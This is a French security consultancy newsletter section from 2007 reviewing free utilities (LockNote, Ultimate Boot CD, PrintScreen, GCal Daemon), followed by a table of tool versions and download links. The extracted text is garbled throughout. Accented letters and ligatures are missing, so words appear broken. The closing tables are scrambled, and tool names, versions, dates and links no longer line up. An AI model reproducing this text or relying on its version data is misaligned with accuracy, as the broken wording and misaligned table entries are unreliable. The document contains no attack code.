Chaque mois, nous vous prsentons les outils libres qui nous paraissent utiles et pratiques. Les logiciels abords sont varis: utilitaires de dveloppement, scurit et autres programmes utiles, voir indispensables, au sein dune entreprise. Ce mois-ci, nous avons choisi de prsenter les logiciels suivants : Locknote: Un bloc note qui chiffre simplement vos donnes. Ultimate Boot CD : Utilitaire de dpannage/restauration Gcal Daemon : Outil de synchronisation dagenda Printscreen : Logiciel de capture dcran Vous trouverez la fin de cette section un tableau rcapitulatif des versions de tous les logiciels prsents lors des prcdents numros de lActu-Scurit.
[19]
WWW.XMCOPARTNERS.COM
LockNote
Bloc note scuris
Version actuelle Utilit Type Description
4/2007
Utilitaire Les logiciels de type bloc note nassure pas comme on le voudrait un niveau de scurit sufsant. En effet, aucun mcanisme de chiffrement ne permet de garder en scurit de simples chiers texte sans installer un logiciel de chiffrement part entire. LockNote est un logiciel dvelopp par la socit Steganos qui rpond aux proccupations des utilisateurs soucieux de garder certaines notes condentielles.
Capture dcran
Tlchargement
Aucune faille de scurit n a t identie LockNote est un logiciel Bloc Note simple et pratique. Aucune installation nest ncessaire, un simple excutable permet denregistrer des notes en entrant un mot de passe chaque enregistrement et ouverture de chiers. Cet utilitaire utilise le chiffrement AES 256 bits qui assure une scurit optimale...
[20]
WWW.XMCOPARTNERS.COM
Ultimate Boot CD
Trousse de secours
Version actuelle Utilit Type Description
Utilitaire Qui na jamais t victime dun virus virulent ou encore de loubli du mot de passe administrateur...? Ultimate Boot CD est la solution a tous vos problme. Cet utilitaire de restauration/dpannage est fourni sous la forme dune image ISO qui, par dfaut, intgre plusieurs outils de diagnostics de disque dur, deux antivirus, des outils de partitionnement, des gestionnaires de boot ou encore un logiciel de rcupration de mots de passe.
Capture dcran
Tlchargement
Aucune faille de scurit n a t identie Ultimate Boot CD est loutil indispensable pour les particuliers comme pour les administrateurs. Ce logiciel va permettre de rparer facilement votre ordinateur vrol ou de rcuprer un mot de passe qui a t perdu par mgarde. Fini les disquettes de boot, place ce CD bootable qui vous sera forcment utile un jour ou lautre.
[21]
WWW.XMCOPARTNERS.COM
Printscreen
Capture dcran
Version actuelle Utilit Type Description
Utilitaire Les captures dcran sont indispensables dans certains corps de mtier. Cependant, loutil Imprim cran natif fourni dans Windows ne rpond pas toutes les attentes. PrintScreen est un logiciel lger qui permet de grer simplement les captures dcran : slection des zones capturer, type et format de limage, destination des captures sauvegardes, choix de la touche raccourcis.
Capture dcran
Tlchargement
PrintScreen est disponible sur Windows 95, 98, Me, NT 4.0, 2000, 2003, XP and Vista ladresse suivante : http://www.gadwin.com/download/ps_setup.exe
Scurit de loutil
Aucune faille na t publie ce jour. Printscreen est un logiciel indispensable aux amateurs de capture dcran. Les consultants XMCO utilisent chaque jour de tels outils qui permettent de gagner du temps et de raliser des captures en un click de souris. Simple, pratique et complet.
Avis XMCO
[22]
WWW.XMCOPARTNERS.COM
Gcal Daemon
Synchroniseur dAgenda
Version actuelle Utilit Type Description
Bureautique Aprs vous avoir prsent Google Agenda le mois dernier, voici un logiciel de synchronisation demploi du temps. Gcal Daemon est loutil adapt. Ce dernier permet de synchroniser votre ordinateur local avec les services Google (Gmail et Google Agenda) et fonctionne en mode bidirectionnel.
Capture dcran
Tlchargement
Ce logiciel multi-plates-formes et dvelopp en Java est disponible pour Windows, Unix et Mac OS X ladresse suivante : http://gcaldaemon.sourceforge.net/features.html
Scurit de loutil
Aucune faille na t publie ce jour. GCal est un outil utile pour tous les nomade qui ont lhabitude de travailler domicile ou dans les transports. La synchronisation est rapide et priodique.
Avis XMCO
[23]
WWW.XMCOPARTNERS.COM
DERNIRE VERSION
Version stables 3.1 r5 2.6.1.5 6.0.0-alpha 5.1.18-bta 5.0.41 4.1.22
DATE
08/05/2007
LIEN
http://www.debian.org/CD/netinst/
Snort MySQL
Apache
11/07/2007
http://www.insecure.org/nmap/download.html http://www.mozilla-europe.org/fr/products/refox/ http://www.mozilla-europe.org/fr/products/thunderbird/ http://spamassassin.apache.org/downloads.cgi?update =200603111700 http://www.chiark.greenend.org.uk/~sgtatham/putty/do wnload.html http://www.clamav.net/stable.php#pagestart http://fr.clamwin.com/content/view/110/1/ http://www.ubuntu-fr.org/telechargement http://www.postx.org/download.html http://www.squid-cache.org/Versions/v2/2.6/ http://lezilla.sourceforge.net/ http://www.openssh.com/ http://www.safer-networking.org/fr/download/index.htm l ftp://ftp.ee.lbl.gov/arpwatch.tar.gz
Putty
0.60
05/2007
ClamAV/ClamAV
0.90.2
05/2007
ARPWatch
[24]
WWW.XMCOPARTNERS.COM
NOM
GnuPG BartPE TrueCrypt Back-Track
DERNIRE VERSION
1.4.7 3.1.10a 4.3a 2.0
DATE
02/2007 6/10/2003
LIEN
http://www.gnupg.org/(fr)/download/ http://severinterrier.free.fr/Boot/PE-Builder/ http://www.truecrypt.org/downloads.php
03/2007
MBSA
2.1.1
02/2007
Ps-Exec
1.83
14/05/2007
Helios
v1.1a
6/06/2006
http://helios.miel-labs.com/2006/07/download-helios.ht ml http://www.opera.com/download/
Opera
9.21
05/2007
IE 7
http://www.microsoft.com/france/windows/downloads/i e/getitnow.mspx
08/05/2007
1.26
http://www.microsoft.com/france/securite/outils/malwar e.mspx
F-Secure Blacklight Writely Nessus Windows Services for Unix VNC Vmware Player Sync Toy
Blacklight Beta
http://www.f-secure.com/blacklight/try_blacklight.html
MySQL Front
3.0
http://www.clubic.com/lancer-le-telechargement-9175-0 -mysql-front.html
Winscp Lcc
04/04/2007 28/02/2007
Cain
4.9
04/2007
[25]
WWW.XMCOPARTNERS.COM
NOM
RSS Bandits Netmeeting OpenOffice
DERNIRE VERSION
1.5.0.10
DATE
04/03/2007
LIEN
http://www.rssbandit.org/
2.2
04/2007
http://www.download.openofce.org/index.html
Pspad
4.5.2
20/10/2006
http://pspad.com/fr/download.php
01/2007 15/05/2007
14/05/2006
09/01/2007
7.5
Extensions Firefox FeedReader Key Pass Password Safe VmWare converter Testdisk Google Desktop UltraBackup Google Reader Google Agenda Emacs 3.0 21.3 24/03/2003 5.0 2007 04/2007 3.0.1 26/04/2007 3.09 1.07 03/2007 16/04/2007
http://extensions.geckozone.org/Firefox/
http://www.feedreader.com/download http://keepass.info/download.html
http://www.vmware.com/download/converter
http://www.google.fr/calendar http://www.gnu.org/software/emacs/
[26]
WWW.XMCOPARTNERS.COM
http://www.google.fr/reader